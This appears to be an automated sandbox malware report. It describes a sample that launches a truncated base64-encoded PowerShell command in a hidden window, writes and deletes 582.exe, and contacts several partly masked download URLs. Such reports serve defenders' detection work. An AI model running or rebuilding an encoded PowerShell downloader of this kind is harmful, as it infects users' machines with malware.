Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAEkARQBQAFQAawBjAGcAPQAnAFgASABNAFYARgB2AHcAcgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBVAHIASQBgAFQAYABZAFAAUgBPAHQATwBDAGAAbwBsACIAIAA9AC...
Modifies file system
Creates the following files
- %HOMEPATH%\582.exe
Deletes the following files
- %HOMEPATH%\582.exe
Network activity
Connects to
- 'wb##ur.com':443
TCP
HTTP GET requests
- http://co###e.com.br/supleforma/9_j08_39f4phvj/
- http://www.co###e.com.br/supleforma/9_j08_39f4phvj/
- http://ge#####vebeaupre.com/wp-admin/7fd9o_6k_mev/
- http://www.ge#####vebeaupre.com/wp-admin/7fd9o_6k_mev/
- http://ga###ice.com/loggers/o_rz_46d99/
UDP
- DNS ASK ga#####erprises.com.au
- DNS ASK co###e.com.br
- DNS ASK ge#####vebeaupre.com
- DNS ASK ga###ice.com
- DNS ASK wb##ur.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAEkARQBQAFQAawBjAGcAPQAnAFgASABNAFYARgB2AHcAcgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBVAHIASQBgAFQAYABZAFAAUgBPAHQATwBDAGAAbwBsACIAIAA9AC...' (with hidden window)
